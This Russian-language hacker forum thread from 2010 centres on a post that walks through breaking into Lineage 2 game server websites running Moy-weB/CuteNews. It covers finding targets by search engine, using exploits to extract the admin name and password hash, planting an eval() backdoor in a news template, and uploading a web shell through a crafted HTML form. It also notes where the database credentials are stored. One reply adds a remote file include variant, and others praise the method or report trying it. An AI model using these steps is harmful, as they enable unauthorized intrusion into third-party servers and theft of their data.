Moy-weB или взлом la2 сервера через CuteNews
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Moy-weB или взлом la2 сервера через CuteNews - 2010-03-26 19:47:28.900000
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
Сейчас вспомнил как ломал la2 серверы с web-обвязкой Moy-weB. Правда способ уже староват, но неделю назад попалось парочка уязвимых. Заходим в админку 1. Поиск в гуглом: © Project -= Moy-weB =- 2. После того как погуглили идем на целевой сайт и заходим в директорию /news/ если есть, то хорошо, если нет гуглим дальше. Так же обязателен файл /news/search.php 3. Дальше используем сплоит для поиска админа [i]$target = 'http://localhost/cutenews.1.4.5/search.php'; [/i] здесь указываем путь к файлу search.php. 3. Следующим шагом будет использование сплоита для поиска MD5 хэша админа. [i]$target = 'http://localhost/cutenews.1.4.5/search.php';[/i] Путь к файлу search.php
[i]$username = 'waraxe'; [/i] Ник админа (получен с помощью первого сплоита).
Если не хотите использовать сплоиты, вы можете восплользоваться этим сайтом 4. Расшифровываем хэш. И идем в админку сайта - /news/ Заливаем шелл 1. Идем в Настройки - Редактировать шаблоны - Активные новости 2. Видим текстовое поле. Туда пишем: HTML;
if(isset($_GET['shell'])) eval($_GET['shell']); 3. Далее проверяем news/show_news.php?shell=phpinfo(); Должна появиться информация о PHP. Приступаем к заливке шелла. 4. Создаем файл HTML : <form action=http://site.com/news/show_news.php?shell=copy($_FILES[file][tmp_name],$_GET[aa]);&aa="локальный путь сайта"\news\shell.php
method=post enctype=multipart/form-data>
<input type=file name=file><br>
<input type=submit value=Загрузить><br>
</form> 5. Радуемся шеллу по адресу - http://site.com/news/shell.php [sm=ab.gif] P.S. Данные для подключения к БД находятся в /config/config.php P.S.S Это моя первая статья о взломе. Не ругайте сильно. [sm=ab.gif] Спасибо Pashkela за метод заливки шелла [sm=ab.gif]
|
|
|
RE: Moy-weB или взлом la2 сервера через CuteNews - 2010-03-29 17:19:14.560000
|
|
|
$r00tk1t$
Сообщений: 84
Оценки: 0
Присоединился: 2010-03-13 14:21:48.886666
|
Респект! [sm=az.gif]
|
|
|
RE: Moy-weB или взлом la2 сервера через CuteNews - 2010-03-29 17:44:33.190000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
Неплоха
|
|
|
RE: Moy-weB или взлом la2 сервера через CuteNews - 2010-04-22 22:03:46.680000
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
Использовать sploit конечно хорошо, но все же ручками интересней ))))
|
|
|
RE: Moy-weB или взлом la2 сервера через CuteNews - 2010-05-11 23:53:24.213333
|
|
|
13thCannabis
Сообщений: 12
Оценки: 0
Присоединился: 2008-10-19 23:06:21.333333
|
Подскажите если выдает такое Warning: copy(W:\uploads\phpE2EC.tmp) [function.copy]: failed to open stream: No such file or directory in W:\*******\common\includes\011.php(2) : eval()'d code on line 1 Что за проблема может быть
|
|
|
RE: Moy-weB или взлом la2 сервера через CuteNews - 2010-06-30 13:37:44.233333
|
|
|
Dark Master
Сообщений: 7
Оценки: 0
Присоединился: 2010-06-29 15:05:50.810000
|
13thCannabis - значит тот сайт не создан май вебом)
|
|
|
RE: Moy-weB или взлом la2 сервера через CuteNews - 2010-06-30 14:16:39.483333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
Продолжай в том же духе… Респект +2) quote:
Далее проверяем news/show_news.php?shell=phpinfo(); Должна появиться информация о PHP. Приступаем к заливке шелла. Если register_globals = On то почему бы не впихнуть <?php include$_GET['shell'] ?> или проще <?php include$shell ?> потом обращаться news.php?shell=http://путь_до_шелла ? ;)
|
|
|
RE: Moy-weB или взлом la2 сервера через CuteNews - 2010-09-17 22:25:32.776666
|
|
|
СaHя
Сообщений: 279
Оценки: 0
Присоединился: 2010-03-12 14:12:55.576666
|
прочитал, попробовал.Спасибо отличная статья!
|
|
|
|
|